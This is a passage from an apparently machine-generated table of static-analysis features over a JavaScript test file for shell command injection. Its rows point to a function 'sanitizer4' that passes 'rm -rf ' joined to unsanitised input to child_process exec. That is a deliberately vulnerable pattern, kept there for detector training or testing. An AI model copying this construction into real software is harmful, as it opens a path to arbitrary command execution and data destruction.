autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:23:531:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:531:23:531:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:4 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:4 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:9 | cp.exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:3:533:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:6:533:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:6:533:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:6:533:9 | exec | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:6:533:9 | exec | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:6:533:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:19 | "rm -rf " | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:11:533:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:23:533:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:23:533:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:23:533:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:23:533:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:23:533:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:533:23:533:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:10 | isNaN | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:10 | isNaN | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:10 | isNaN | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:10 | isNaN | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:10 | isNaN | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | exceptional return of isNaN(name - 0) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | exceptional return of isNaN(name - 0) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | exceptional return of isNaN(name - 0) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | exceptional return of isNaN(name - 0) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | exceptional return of isNaN(name - 0) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:6:536:20 | isNaN(name - 0) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:12:536:15 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:12:536:15 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:12:536:15 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:12:536:15 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:12:536:15 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:536:19:536:19 | 0 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 